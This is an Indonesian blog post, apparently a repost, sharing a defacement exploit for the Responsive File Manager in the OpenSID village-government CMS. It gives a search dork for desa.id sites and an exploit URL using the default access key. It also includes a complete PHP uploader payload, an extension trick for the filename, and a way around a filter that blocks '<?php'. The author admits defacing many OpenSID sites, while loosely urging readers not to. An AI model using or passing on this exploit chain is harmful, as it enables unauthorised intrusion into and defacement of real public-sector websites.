Deface poc RFM Open Sid Inject filename



-
Hai Sobat.
Saya Rahmat
Disini, saya akan share exploit RFM Inject filename.
-
> saya cuma ingin memberi solusi & info & yah exploit nya juga :'v

Langsung saja
- dork : site:desa.id
              inurl:/first intitle:Website resmi
- exploit : localhost/assets/filemanager/dialog.php?akey=GantiKunciDesa
- uploader dengan format .php<?.txt


 <? echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Uploaded Successfully :p</b><br><br>'; } else { echo '<b>Upload Failed! >:( </b><br><br>'; } } ?>

> disini saya tidak memberi tahu cara mendeface nya. Cukup kalian gunakan otak saja.
> Mengapa di bahan kita memerlukan uploader khusus? Bukan khusus-khusus amat sih :'v.

Waktu pertama kali saya mencoba exploit RFM di CMS OpenSID ini, terasa ada yang aneh.
Karena waktu itu saya tidak ingin ribet-ribet mengupload uploader lalu mengupload shell,
Yang artinya saya langsung ingin mengupload shell tetapi hasilnya? Obfuscate shell,Mini shell, bypass shell lainnya tidak berhasil.

Lalu saya mencoba mencari tahu melalui tamper data. Saya pikir itu masalah extensi, saya terus mencoba berganti-ganti extensi seperti .phtml<?.txt / .PhP5<?.txt / .pHP5<?.txt dan hasilnya? Nihil tidak ada yang terupload. Lalu saya mencoba mengupload SSI shell dan saya mendapatkan status 200 OK yang berarti terupload. Lalu saya mencoba melakukan command rce untuk mengupload shell nya langsung ke dalam document_root tapi? SSI shell yang terupload ternyata error dan sangat tidak berguna.

Rasa penasaran saya semakin meningkat, saya mencoba upload script deface dengan format .html<?.txt dan berhasil terupload. Lalu saya mulai berpikir mungkin ada filter yang mendetect sebuah code php di path RFM tersebut :'(.
Awal-awal saya mencoba code < dan mendapatkan status 200 OK. Lanjut saya mencoba menambahkan <? Dan hasilnya sama, saya mendapat status 200 OK, lalu saya memasukan code <?php dan mendapatkan 406 not acceptable.
Yaps benar saja, terdapat filter yang tidak memperbolehkan code <?php di path RFM tersebut.

Dan kita membutuhkan uploader yang hanya memanfaatkan echo, yang terkadang tidak semua server dapat menerimanya dengan tulus.

> Dan, saya ingin mengingatkan kalian yang menebas website desa, jangan boy kasian adminnya. Temen gw ngeupload video di youtube abis itu di comment ama developer CMS opensid.
Sekilas developer mengatakan : 


 Developer : Seperti kasus George Floyd di amerika serikat, menebas orang atau website desa yang terbilang lugu dan polos tidak ada kehormatan dalam hal tersebut.

Yah sekilas seperti itu, namun masih panjang. Tapi saya tidak ingat karena screenshotan nya sudah terhapus di handphone saya.
Sekali lagi nih,
upload shell untuk mempatch atau mengganti key RFM nya itu tidak masalah. Tapi jangan upload shell untuk menebas website nya dan menuliskan Hacked By itu tidak asik boy :'v.

Walaupun gw waktu belum dapet screenshotannya. Gw banyak nebas web OpenSID. Namun? Gw patch boy biar yang lain g bisa redeface. Dan index pun gw balikin sehabis mirror :'v.

Yah mungkin segitu aja

Repost:https://draxploit.blogspot.com/2020/06/rfm-inject-filename-di-cms-opensid.html?m=1

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel